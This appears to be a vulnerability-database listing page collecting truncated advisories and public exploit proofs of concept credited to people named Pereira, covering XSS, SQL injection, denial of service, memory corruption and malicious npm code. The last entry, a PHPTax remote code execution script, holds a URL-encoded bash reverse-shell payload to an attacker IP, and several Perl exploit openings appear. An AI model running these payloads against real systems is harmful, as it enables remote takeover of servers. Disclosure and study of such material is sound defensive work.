CVE-2025-57932

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Diego Pereira PowerFolio portfolio-elementor allows Stored XSS.This issue affects PowerFolio: from n/a through = 3.2.1...

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. Compromised versions of this package contain a file called bundle.js that exfiltrates secrets from the user's accounts, including credentials and API tokens. It also downloads malicious files and repackages them...

Embedded Malicious Code

Overview Affected versions of this package are vulnerable to Embedded Malicious Code. Compromised versions of this package contain a file called bundle.js that exfiltrates secrets from the user's accounts, including credentials and API tokens. It also downloads malicious files and repackages them...

mendespereira.com.br Improper Access Control vulnerability OBB-3789924

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

WordPress Download Monitor plugin <= 4.5.9 - Authenticated Arbitrary File Download vulnerability

Authenticated Arbitrary File Download vulnerability discovered by Thiago Martins, Jorge Buzeti, Leandro Inacio, Lucas de Souza, Matheus Oliveira, Filipe Baptistella, Leonardo Paiva, Jose Thomaz, Joao Maciel, Vinicius Pereira, Geovanni Campos, Hudson Nowak, Guilherme Acerbi in WordPress Download...

See how do I find the value of 3 thousand 6 thousand USD Google RCE vulnerability-vulnerability warning-the black bar safety net

! This article tells the story of the Uruguayan public University, 18-year-old student Ezequiel Pereira found Google highest level RCE vulnerability-related process. In the beginning of the year, Ezequiel found Google Google App Engine GAEis a non-production environment of a vulnerability, exploi...

FreeVimager 4.1.0 Crash PoC

No description provided by source. !/usr/bin/perl FreeVimager 4.1.0 = WriteAV Arbitrary Code Execution Author: Jean Pascal Pereira [email protected] Vendor URI: http://www.contaware.com Vendor Decription: This is a Free & Fast Image Viewer and Editor for Windows. It can as well play avi video...

HCView WriteAV Crash PoC

No description provided by source. !/usr/bin/perl Hardcoreview WriteAV Arbitrary Code Execution Author: Jean Pascal Pereira [email protected] Vendor URI: http://sourceforge.net/projects/hardcoreview/ Vendor Description: Image browser. Designed and created for profesional and amature watching imag...

DomsHttpd <= 1.0 - Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl DomsHttpd 1.0 = Remote Denial Of Service Exploit Credit: Jean Pascal Pereira [email protected] Usage: domshttpd.pl host port use strict; use warnings; use IO::Socket; my $host = shift || localhost; my $port = shift || 88; my $sock =...

Internet Explorer 9 XSS Filter Bypass

No description provided by source. Internet Explorer 9 XSS Filter Bypass Discovered by: Jean Pascal Pereira [email protected] Vendor information: Internet Explorer formerly Microsoft Internet Explorer and Windows Internet Explorer, commonly abbreviated IE or MSIE is a series of graphical web...

CommPort <= 1.01 - Multiple Vulnerabilities

No description provided by source. -------------------------------------------- CommPort 1.01 = SQL Injection Vulnerability -------------------------------------------- Discovered by: Jean Pascal Pereira [email protected] Vendor information: A 'Community Portal' generator that can be tailored for...

Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit

--------------------------------------------------- Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit --------------------------------------------------- Credit: Jean Pascal Pereira [email protected] Description: Mozilla Firefox is prone to a memory exhaustion vulnerability. The issue has been...

Microsoft Internet Explorer 9.x Stack Exhaustion

---------------------------------------------------------------------- Microsoft Internet Explorer 9.x Vendor: Microsoft Internet Explorer 9.x and below Description: The application is prone to a remote stack overflow vulnerability. Successful exploitation may lead to arbitrary code execution...

DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution

!/usr/bin/perl DIMIN Viewer 5.4.0 Vendor URI: http://www.dimin.net Vendor Decription: View images in countless formats, and apply a variety of effects with this small, fast, and powerful application. Dimin Viewer incorporates unique visualization ideas, like Panoramic Photographs Tool and Big Ima...

Internet Explorer 9 Memory Corruption

/ settimelimit0; iniset'memorylimit', '300M'; if!fileexists"junk.htm" $string = ""; fileputcontents"junk.htm", $string; print "View the sourcecode of the iframe below right click - view source: \n"; print "\n"; for$i = 0; $i \n"; / http://0xffe4.org / ?...

Internet Explorer 9 Memory Corruption PoC Exploit

Internet Explorer version 9.0.8112.16421 Memory Corruption PoC Exploit / settimelimit0; iniset'memorylimit', '300M'; if!fileexists"junk.htm" $string = ""; fileputcontents"junk.htm", $string; print "View the sourcecode of the iframe below right click - view source: \n"; print "\n"; for$i = 0; $i...

Internet Explorer 9 XSS Filter Bypass

Internet Explorer 9 XSS Filter Bypass Discovered by: Jean Pascal Pereira Vendor information: "Internet Explorer formerly Microsoft Internet Explorer and Windows Internet Explorer, commonly abbreviated IE or MSIE is a series of graphical web browsers developed by Microsoft and included as part of...

VLC Player 2.0.3 ReadAV Arbitrary Code Execution

!/usr/bin/perl VLC Player 2.0.3 Vendor URI: http://www.videolan.org/vlc/ Vendor Description: VLC is a free and open source cross-platform multimedia player and framework that plays most multimedia files as well as DVD, Audio CD, VCD, and various streaming protocols. Debug Info: Microsoft R Window...

JPEGsnoop 1.5.2 - WriteAV Crash (PoC)

JPEGsnoop 1.5.2 - WriteAV Crash PoC !/usr/bin/perl JPEGsnoop 1.5.2 Vendor URI: http://sourceforge.net/projects/jpegsnoop/ Vendor Description: JPEGsnoop is a detailed JPEG image decoder and analysis tool. It reports all image metadata and can even help identify if an image has been edited. Debug...

PHPTax 0.8 Remote Code Execution

!/usr/bin/env python PHPtax 0.8 " print "Where payload is http://whatever.com/phptax - path to PHPtax with NO trailing /" sys.exit1 banner target = sys.argv1 reverseip = sys.argv2 reverseport = sys.argv3 payload = '%2Fbin%2Fbash%20%3E%26%20%2Fdev%2Ftcp%2F'+reverseip+'%2F'+reverseport+'%200%3E%261...